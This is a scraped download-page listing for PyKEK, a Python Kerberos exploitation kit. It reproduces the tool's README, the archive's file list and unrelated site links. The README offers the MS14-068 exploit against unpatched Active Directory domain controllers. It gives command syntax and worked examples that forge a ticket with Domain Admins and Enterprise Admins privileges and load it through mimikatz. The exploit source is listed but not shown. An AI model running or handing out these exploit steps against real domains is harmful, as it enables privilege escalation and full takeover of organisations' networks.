Python Kerberos Exploitation Kit
===
PyKEK (Python Kerberos Exploitation Kit), a python library to manipulate KRB5-related data. (Still in development)
For now, only a few functionalities have been implemented (in a quite Quick'n'Dirty way) to exploit MS14-068 (CVE-2014-6324) .
More is coming...
# Author
Sylvain Monné
Contact : sylvain dot monne at solucom dot fr
http://twitter.com/bidord
Special thanks to: Benjamin DELPY `gentilkiwi`
# Library content
* kek.krb5: Kerberos V5 ([RFC 4120](https://tools.ietf.org/html/rfc4120)) ASN.1 structures and basic protocol functions
* kek.ccache: Credential Cache Binary Format ([cchache](http://www.gnu.org/software/shishi/manual/html_node/The-Credential-Cache-Binary-File-Format.html))
* kek.pac: Microsoft Privilege Attribute Certificate Data Structure ([MS-PAC](http://msdn.microsoft.com/en-us/library/cc237917.aspx))
* kek.crypto: Kerberos and MS specific cryptographic functions
# Exploits
## ms14-068.py
Exploits [MS14-680](https://technet.microsoft.com/en-us/library/security/ms14-068.aspx) vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups :
- Domain Users (513)
- Domain Admins (512)
- Schema Admins (518)
- Enterprise Admins (519)
- Group Policy Creator Owners (520)
### Usage :
```
USAGE:
ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>
OPTIONS:
-p <clearPassword>
--rc4 <ntlmHash>
```
### Example usage :
#### Linux (tested with samba and MIT Kerberos)
```
root@kali:~/sploit/pykek# python ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
Password:
[+] Building AS-REQ for dc-a-2003.dom-a.loc... Done!
[+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done!
[+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done!
[+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done!
[+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done!
[+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done!
[+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done!
[+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done!
[+] Creating ccache file 'TGT_user-a-1@dom-a.loc.ccache'... Done!
root@kali:~/sploit/pykek# mv TGT_user-a-1@dom-a.loc.ccache /tmp/krb5cc_0
```
#### On Windows
```
python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
mimikatz.exe "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit`
```
pykek-ms14-068.zip (39个子文件) 
pykek-master kek 
__init__.py 0B _crypto __init__.py 0B MD5.py 62B ARC4.py 673B MD4.py 69B util.py 1KB krb5.py 15KB crypto.py 2KB ccache.py 7KB pac.py 12KB pyasn1 __init__.py 173B compat __init__.py 59B octets.py 602B type __init__.py 59B namedtype.py 5KB constraint.py 7KB namedval.py 2KB useful.py 393B univ.py 39KB tag.py 4KB char.py 2KB tagmap.py 2KB base.py 9KB error.py 84B debug.py 2KB codec __init__.py 59B cer __init__.py 59B decoder.py 1KB encoder.py 3KB der __init__.py 59B decoder.py 192B encoder.py 993B ber __init__.py 59B decoder.py 36KB eoo.py 237B encoder.py 13KB error.py 129B ms14-068.py 7KB README.md 2KB资源评论
十年人间~
- 粉丝: 1378
- 资源: 244
最新资源
- 广工操作系统keshe
- (8110644)CIA讲义\CIA讲义\II\A实施内部审计业务.doc
- 面向多设备、支持多语言的统一编程平台 OpenArkCompiler四个技术特点能够将不同语言代码编译成一套可执行文件,在运行环境中高效执行:支持多语言联合优化、消除跨语言调用开销;更轻量的语言运行时
- (174705420)基于stm32 的简单的智慧农业系统, 有上位机,有下位机
- (172712814)计算器设计1
- (1824456)java课程设计之计算器
- (1866400)java编的计算器程序
- (175213200)创维E900V22E-S905L卡刷固件root语音正常
- student.sql
- 手机电池4面贴标机(sw14可编辑+工程图)全套技术资料100%好用.zip
- (175206212)创维E900V21E-S905L卡刷固件root语音正常
- (3961620)最新C#,sharp,winform记事本
- 手机锂电池正压测漏机(sw17可编辑+工程图+BOM)全套技术资料100%好用.zip
- (10745218)宿舍管理系统源码20130329
- 【锂电池剩余寿命预测】CNN-LSTM锂电池剩余寿命预测,马里兰大学锂电池数据集(Pytorch完整源码和数据)
- (178244442)springboot + vue3 房屋租赁系统源码+数据库.zip
资源上传下载、课程学习等过程中有任何疑问或建议,欢迎提出宝贵意见哦~我们会及时处理!
点击此处反馈
